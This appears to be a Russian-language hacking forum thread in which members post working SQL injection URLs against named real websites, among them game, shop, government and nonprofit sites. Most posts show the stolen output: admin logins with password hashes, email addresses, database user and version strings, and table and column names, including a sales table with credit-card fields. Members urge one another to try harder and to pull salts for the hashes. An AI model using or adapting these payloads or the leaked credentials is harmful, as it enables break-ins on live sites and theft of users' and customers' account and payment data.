SQL Инъекции

МАКС

http://www.aviasalon.com

SQL-инъекция содержится в форме поиска

Двойная кавычка вызывает ошибку в SQL-запросе, что даёт возможность узнать установочный путь скрипта

/home/aviasalon.com/data/htdocs/modules/mod_search.php ,

а также увидеть текст нескольких SQL-запросов. Так, можно получить информацию об именах некоторых таблиц и их полях.

Таблица______________Поля

engine_page: id,title,menu_id,content,keywords,description,status
list_param_value: value, item_id
list_item: id, title, alias, type_id
list_type: alias, id, prefix, suffix, title
data_news_item: title, alias, content, anons, topic_id
data_news_topic: alias, id
data_expo_company: title, alias, about, contacts

Запрос с одинарной кавычкой вызовет ошибку в регулярном выражении, раскрыв путь скрипта на сервере (см. выше)

 

Для Myke007

Усердней!!!!!!

Code:

http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,psw),10,11+from+login+limit+0,1/*

Поля :

Code:

username, psw

 

Code:

http://www.futureplay.org/news.php?id=999+union+select+1,login,3,user_password,5,6,7+from+user/*

Admins Password eMail

dloosemore /e8a59ea2c530174b8f60562d05a4403f /[email protected]
praycroft /b35c7298864f797f41e7b9da8781ed63 /[email protected]
picto_admin /0ef2057aa44ce08666f6a5876bf8da19 /[email protected]

 

Code:

http://www.[COLOR=DarkGreen]sthscareers.com[/COLOR]/news.php?id=-76+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(concat_ws(char(58,58),user(),database(),version()),0x73),0x73),5,6,7,8,9,10,11,12,13,14,15/*  

root@localhost::sths_hr1::4.1.10a

Code:

http://www.[COLOR=DarkGreen]americanfibersystems.com[/COLOR]/news.php?id=-71+union+select+1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7,8,9,10,11,12/*  

afsnetworks2@localhost::afs_site::4.1.20

Code:

http://www.[COLOR=Green]americanfibersystems.com[/COLOR]/news.php?id=-71+union+select+1,2,concat_ws(char(58,58),username,passwd),4,5,6,7,8,9,10,11,12+from+users/*  

admin::b6983419181946ae88210bf45a998e5b
[email protected]::6b340fa679eca67086d97ddbfb9894c3::majerle

 

Code:

http://www.nfb.ca/about/news.php?id=-1585+union+select+1,version(),3,concat_ws(0x2F,login,pass),5,6,7,8,9,10,11,12,13,14+from+user/*

Version: 5.0.37-log/webadmin@localhost/texte

Admins:
Login Password

florence / *C6E74EDED542939C3FF2F2277CD9EDD14719455A
ryan /*8DC81F46F004E99DD2347305BF897C973FD50956

 

мозгоёбство:

стока парица, и нет ничё нормального.

Code:

http://www.filmdeculte.com/film/film.php?id=-1978+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+film/*

4-ая ветка =\

 

Code:

http://www.[COLOR=Olive]exploresouthbend.org[/COLOR]/news.php?id=-96+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(char(58,58),user(),database(),version()),0x73),0x73),4,5/*  

[email protected]::livethelegends::4.1.10a-log

Code:

http://www.[COLOR=Olive]gemeindebund.at[/COLOR]/news.php?id=-334+union+select+1,2,3,4,5,concat_ws(char(58,58),user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

[email protected]::cad_gemeindebund::4.0.24-standard

 

Code:

http://www.tweak.dk/nyheder2.php?id=-15246+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users/*

Code:

http://www.salesafter.de/index.php?id=-30+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13/*

 

Это мой первый пост так что не судите строго, если что то не так =)

http://www.ugkr.ru/news.asp?id=-842+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19.20,21,22,23--
http://www.ugkr.ru/news.asp?id=-842%20union%20select%201,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19.20,21,22,23%20from%20information_schema.tables%20where%20table_name%20not%20in%20('ABITUR','BIBLIOTEKA')--

Нужная табличка USRGENERAL, а вот список столбцов в ней:
FIRSTLOGON
ID
KEYKOD
KOD_1S
NAME1
NAME2
NAME3
PASKEY
PASSWORD
USER_BIRTH
USER_GENDER
USER_INN
USER_MAIL
USER_PROXCART
USER_RIGHT
USER_SPEC
USER_STUD_STAT_PERIOD
USER_STUD_STATUS
USER_TYPE
USER_UCHGROUP
USER_UDOST
USER_UDOST_DATE
USER_UDOST_NOMER
USER_UDOST_SERIAL

 

не добил - поле пароля ни как не подберу ..
http://www.denicek.altre.cz/admin

 

pw

 

http://www.funisland.com/gamelist.php?id=-13+UNION+SELECT+1,password,username,4,5,6,7,8,9,10,11,12,13,14,15+from+admin/*

 

Code:

http://www.recado.ru/index.php?id=9999+union+select+1,2,concat(user,0x3a,pass)+from+users+limit+0,1/*

Code:

http://www.shemaroo.com/online/product.asp?productid=2279'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('ContestResults','Countries','Currency','DetailPoll','Download','download_logins','DownloadDetails','Film','HomeImages','Login','dtproperties','MblCon','MISDNRange','Order_Details','Order_Master','Order_DetailsIntl','Order_MasterIntl'))--&sent=1

Tables: 'ContestResults','Countries','Currency','DetailPoll','Download','download_logins','DownloadDetails','Film','HomeImages','Login','dtproperties','MblCon','MISDNRange','Order_Details','Order_Master','Order_DetailsIntl','Order_MasterIntl

Columns из "Login":
'KeyID','LastLogDate','LoginId','PassAns','PassQues','Password','Status'

Code:

http://musical-shop.de/details.asp?Artikelnr=10301'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('Pages_MusicalShop','sysconstraints','syssegments','Bewertungen','D99_Tmp','Tab_Artikel','Tab_Artikel_BACKUP','Tab_Musicalnews','Tab_MusicalHistory','Tab_MusicalPremieren','Tab_Musicals','Tab_Musicaltickets','Tab_Playbacks','Tab_Premieren','Tab_Soundclips','Tab_Soundtracks'))--

Tables: Pages_MusicalShop','sysconstraints','syssegments','Bewertungen','D99_Tmp','Tab_Artikel','Tab_Artikel_BACKUP','Tab_Musicalnews','Tab_MusicalHistory','Tab_MusicalPremieren','Tab_Musicals','Tab_Musicaltickets','Tab_Playbacks','Tab_Premieren','Tab_Soundclips','Tab_Soundtracks','Werbebanner'

Code:

http://www.dvd-shop.ch/result.php?menuid=2'+union+select+1,21,3,table_name+from+information_schema.tables+where+table_name+not+in+('CHARACTER_SETS','COLLATIONS','COLLATION_CHARACTER_SET_APPLICABILITY','COLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS')/*

Code:

http://www.artrainusa.org/artwork.asp?item=(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='Sales'%20and%20column_name%20not%20in%20('CustID','OrderID','BName','BCompany','BAddress','BCity','BState','BZip','BCountry','Name','Company','Address','City','State','Zip','Country','Phone','Email','Details','SubTotal','Tax','Shipping','ShippingType','GrandTotal','CC','CCNo','CCExp','DatePosted','isDonation','anonymous','mailinglist','contact_preference','contact_idea'))--

Tables:
'News','Calendar','Catalog','dtproperties','Features','Sales','sysconstraints'

Columns из 'Sales':
'CustID','OrderID','BName','BCompany','BAddress','BCity','BState','BZip','BCountry','Name','Company','Address','City','State','Zip','Country','Phone','Email','Details','SubTotal','Tax','Shipping','ShippingType','GrandTotal','CC','CCNo','CCExp','DatePosted','isDonation','anonymous','mailinglist','contact_preference','contact_idea'

 

Code:

http://www.acte.org/resources/press_release.php?id=-91+union+select+1,2,3,concat(id,0x3a,login,0x3a,password),5,6,7,8,9+from+users/*

Code:

http://www.dswd.gov.ph/faqdetails.php?id=-47+union+select+1,concat(ID,0x3a,username,0x3a,password),3,4,5,6+from+P_admin/*

Code:

http://www.bactravel.it/centri/schede.php?id=-9+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

 

Первая инъекция, сильно не ругайте

Code:

http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+database(),2,VERSION(),user(),5,6,7,8,9,10/*

Code:

http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+1,name,3,4,5,6,7,8,9,10+from+users+where+name=admin/*

 

Немного доработал, от меня такой вариант:

HTML:

http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+concat(name,0x3a,email),2,3,4,5,6,7,8,9,10+from+users/*

 

убийствеенная скуля в mssql(это всё одна скуля) тут выводить не стал, т.к. то что вывел для себя- всеравно не подошло.

Code:

http://www.cerclefinance.com/default.asp?pub=valactu&localcode=&isin=&art=1+or+1=(SELECT+TOP+1+TABLE_NAME
+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('REFERENTIAL_CONSTRAINTS','ficcf13000EMAILS'
,'Portrait_Type','site','CHECK_CONSTRAINTS','CONSTRAINT_TABLE_USAGE','Pays_Calsta','cf_stat_1','CONSTRAINT_COLUMN_USAGE'
,'non_membres'','VIEWS','compteur_connexions',,)'VIEW_TABLE_USAGE','VIEW_COLUMN_USAGE','calendrier_stat','audit_lignes'
,'Sondage_Trace','dtproperties','valtop','Interview','articles','Hard-Bounces','Dossier_Lexique','exception','Interview_Futur','utilisateur'
,'emailing_tmp','cp_20070426','pays','Dossier','alerte_env','email_env','menu_profil','habilitation_journaliste','questions','articles_test'
,'newsvaleurlast','envoi','Interview_Type','avis_des_brokers','type_article','PROFIL','format','menu','Conseils','desabonne','t_jiaozhu',
'email_SNCF','articles_sauv','Dossier_Theme','ICB','popup','Economic_group','CF_ibase','accnew','tmpemail','newsvaleur','stocksname',
'nospam','aide','Dep','membres_relance','emailing_Effidata','CF_vue_nb_mails','forum2','concours','enquete','CmdShell','pop_email'
,'seuils_et_resistances','parties_payantes','DossiersTMP','calendrier_ste','concours_oct2001_questions','eco_group','cookies','Contacts_CP'
,'liens_articles','ENTREPRISE',''Interview_Bio','emailing_tmp_Himedia','essai','membres_email_faux','concours_oct2001_reponses','newshebdo'
,'mailing_cpr','images','initiation','KEY_COLUMN_USAGE','markviral','CreaFinance_Mails','morning_env','membres','CONSULTATION_ARTICLE'
,'DateXML5','nokia','membres3','articles_2003','noms','env_tmp_atos_sg','noms2','Valeur_perso','avisdesbrokers','pub','stats','non_membres
_email_faux','concours_oct2001_participants','valtopbs','habilitation','JOUR_FERIE','forum','ibase_20070122','Interview_QR','type_xml','FTP_Trace',
'groupe_menu','tmpemail2','nochronique','articles_2002','EMail_20060616','fondamentaux','emailing_tmp_ibase','invalides','ficcfp','OST','stat_membres
','secteur','Sondage_Proposition','utilisateurs_click_and_buy','Sondage','syssegments','situation','sysconstraints','sysalternates','etudes'
,'SCHEMATA','TABLES','membres_v2','TABLE_CONSTRAINTS','FauxEmails','TABLE_PRIVILEGES','COLUMNS','centre','COLUMN_DOMAIN_USAGE'
,'COLUMN_PRIVILEGES','DOMAINS','Portrait','DOMAIN_CONSTRAINTS','invalides_20071129','recommandations'))--

 

Для Mike007

Когда начнём стараться?!

Code:

http://www.dualtime.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4/*

4.0.27:replica_db0:[email protected]

Code:

http://www.mywatches.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4/*

5.0.45-log:u80484:[email protected]

Code:

http://www.atlantic-time.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4/*

5.0.45-log:u48597:[email protected]

 

Тут можно вынести всю базу:

Code:

http://www.3roms.com/index.php?page=rom_dl&rid=-1'+union+select+1,concat(username,0x3a,password),icq,4,5,6,7,convert(concat(user(),0x3,version(),0x3,database())+using+latin1),9,10,11,12+from+user+limit+1,2/*

Хеш с солью

Code:

http://www.3roms.com/index.php?page=rom_dl&rid=-1'+union+select+1,concat(username,0x3,password,0x3a,salt),icq,4,5,6,7,convert(concat(user(),0x3,version(),0x3,database())+using+latin1),9,10,11,12+from+user+limit+1,2/*

 

2 Momiji

Там хеш соленый, добавь в запрос "salt".